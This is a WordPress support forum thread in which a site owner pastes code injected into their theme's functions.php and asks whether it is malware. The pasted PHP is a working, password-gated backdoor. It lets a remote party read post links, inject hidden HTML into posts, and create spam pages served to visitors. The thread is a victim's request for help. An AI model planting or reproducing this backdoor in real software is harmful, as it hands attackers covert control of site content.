Support » Fixing WordPress » Is my site being hacked?

  • Every weeks my site got into blank page from both frontend and backend.

    I checked carefully and found out that the reason behind ís my themes/functions.php was modified.

    If I restore a previous backup of functions.php my site will be working again.

    Below is the code of modified functions, can anybody please look at it and tell me if it’s malware? Thank you so much!

    <?php
    
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '16e13fe01b6dc89affaf62fae02db7b1'))
    	{
    		switch ($_REQUEST['action'])
    			{
    				case 'get_all_links';
    					foreach ($wpdb->get_results('SELECT * FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>post_status</code> = "publish" AND <code>post_type</code> = "post" ORDER BY <code>ID</code> DESC', ARRAY_A) as $data)
    						{
    							$data['code'] = '';
    							
    							if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
    								{
    									$data['code'] = $_[1];
    								}
    							
    							print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
    						}
    				break;
    				
    				case 'set_id_links';
    					if (isset($_REQUEST['data']))
    						{
    							$data = $wpdb -> get_row('SELECT <code>post_content</code> FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>ID</code> = "'.mysql_escape_string($_REQUEST['id']).'"');
    							
    							$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
    							if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';
    
    							if ($wpdb->query('UPDATE <code>' . $wpdb->prefix . 'posts</code> SET <code>post_content</code> = "' . mysql_escape_string($post_content) . '" WHERE <code>ID</code> = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
    								{
    									print "true";
    								}
    						}
    				break;
    				
    				case 'create_page';
    					if (isset($_REQUEST['remove_page']))
    						{
    							if ($wpdb -> query('DELETE FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'"'))
    								{
    									print "true";
    								}
    						}
    					elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
    						{
    							if ($wpdb -> query('INSERT INTO <code>' . $wpdb->prefix . 'datalist</code> SET <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'", <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string($_REQUEST['content']).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
    								{
    									print "true";
    								}
    						}
    				break;
    				
    				default: print "ERROR_WP_ACTION WP_URL_CD";
    			}
    			
    		die("");
    	}
    
    	
    if ( $wpdb->get_var('SELECT count(*) FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    	{
    		$data = $wpdb -> get_row('SELECT * FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
    		if ($data -> full_content)
    			{
    				print stripslashes($data -> content);
    			}
    		else
    			{
    				print '<!DOCTYPE html>';
    				print '<html ';
    				language_attributes();
    				print ' class="no-js">';
    				print '<head>';
    				print '<title>'.stripslashes($data -> title).'</title>';
    				print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
    				print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
    				print '<meta name="robots" content="index, follow" />';
    				print '<meta charset="';
    				bloginfo( 'charset' );
    				print '" />';
    				print '<meta name="viewport" content="width=device-width">';
    				print '<link rel="profile" href="http://gmpg.org/xfn/11">';
    				print '<link rel="pingback" href="';
    				bloginfo( 'pingback_url' );
    				print '">';
    				wp_head();
    				print '</head>';
    				print '<body>';
    				print '<div id="content" class="site-content">';
    				print stripslashes($data -> content);
    				get_search_form();
    				get_sidebar();
    				get_footer();
    			}
    			
    		exit;
    	}
    
    ?><?php
Viewing 5 replies - 1 through 5 (of 5 total)
Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Is my site being hacked?’ is closed to new replies.